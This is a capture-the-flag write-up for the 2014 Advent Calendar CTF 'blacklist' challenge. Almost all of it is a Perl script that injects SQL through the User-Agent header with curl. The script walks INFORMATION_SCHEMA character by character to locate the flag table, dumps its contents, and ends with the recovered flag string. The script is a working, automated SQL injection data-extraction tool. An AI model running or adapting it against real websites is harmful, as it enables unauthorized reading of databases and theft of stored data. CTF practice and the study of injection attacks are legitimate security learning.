ytoku/CTF/Writeup/AdventCalendarCTF2014/2014-12-11

MMA

blacklist

問題

We have stupid blacklist. The flag is in flag table.

blacklist.adctf2014.katsudon.org

source

メモ

解法

   1 use strict;
   2 use warnings;
   3 
   4 my $url = "http://blacklist.adctf2014.katsudon.org/";
   5 
   6 sub system_pipe {
   7     my @args = @_;
   8     open my $pipe, "-|", @args or return;
   9     my @result = <$pipe>;
  10     join "", @result;
  11 }
  12 
  13 sub extract_count_rows {
  14     my $from = shift;
  15     my $where = shift;
  16     
  17     my $where_clause;
  18     if ($where) { $where_clause = "WHERE $where" }
  19     else { $where_clause = "" }
  20     
  21     sleep 1;
  22     my $ua = "0' + (SELECT COUNT(*) FROM $from $where_clause) + '";
  23     my $result = system_pipe "curl", "-s", "-A", $ua, $url;
  24     if ($result =~ /<li>.*?"(.*?)"/) {
  25         return int($1);
  26     }
  27     else { die }
  28 }
  29 
  30 sub extract_length {
  31     my $row_at = shift;
  32     my $column = shift;
  33     my $from = shift;
  34     my $where = shift;
  35     
  36     my $where_clause;
  37     if ($where) { $where_clause = "WHERE $where" }
  38     else { $where_clause = "" }
  39     
  40     sleep 1;
  41     my $ua = "0' + (SELECT LENGTH($column) FROM $from $where_clause LIMIT $row_at,1) + '";
  42 #print $ua, "\n";
  43     my $result = system_pipe "curl", "-s", "-A", $ua, $url;
  44     if ($result =~ /<li>.*?"(.*?)"/) {
  45 #print $&, "\n";
  46         return int($1);
  47     }
  48     else { die }
  49 }
  50 
  51 sub extract_char {
  52     my $row_at = shift;
  53     my $char_at = shift;
  54     my $column = shift;
  55     my $from = shift;
  56     my $where = shift;
  57     
  58     my $where_clause;
  59     if ($where) { $where_clause = "WHERE $where" }
  60     else { $where_clause = "" }
  61     $char_at++;
  62     
  63     sleep 1;
  64     my $ua = "0' + (SELECT ORD(SUBSTR($column, $char_at, 1)) FROM $from $where_clause LIMIT $row_at,1) + '";
  65 #print $ua, "\n";
  66     my $result = system_pipe "curl", "-s", "-A", $ua, $url;
  67     if ($result =~ /<li>.*?"(.*?)"/) {
  68 #print $&, "\n";
  69         return chr($1);
  70     }
  71     else { die }
  72 }
  73 
  74 sub extract {
  75     my $column = shift;
  76     my $table = shift;
  77     my $where = shift;
  78     my @result;
  79     my $nrows = extract_count_rows($table, $where);
  80     for my $r (0..$nrows-1) {
  81         my $s = "";
  82         my $length = extract_length($r, $column, $table, $where);
  83         for my $i (0..$length-1) {
  84             $s .= extract_char($r, $i, $column, $table, $where);
  85         }
  86         push @result, $s;
  87     }
  88     return @result;
  89 }
  90 
  91 =comment
  92 print "$_\n"
  93     for extract("SCHEMA_NAME", "INFORMATION_SCHEMA.SCHEMATA");
  94 =comment
  95 information_schema
  96 blacklist
  97 =cut
  98 
  99 =comment
 100 print "$_\n"
 101     for extract("TABLE_NAME", "INFORMATION_SCHEMA.TABLES",
 102                 "TABLE_SCHEMA='blacklist'");
 103 =comment
 104 access_log
 105 flag
 106 =cut
 107 
 108 =comment
 109 print "$_\n"
 110     for extract("COLUMN_NAME", "INFORMATION_SCHEMA.COLUMNS",
 111                 "TABLE_SCHEMA='blacklist' AND TABLE_NAME='flag'");
 112 =comment
 113 flag is here!!!
 114 =cut
 115 
 116 print "$_\n" for extract("`flag is here!!!`", "blacklist.flag", "");
 117 # ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT
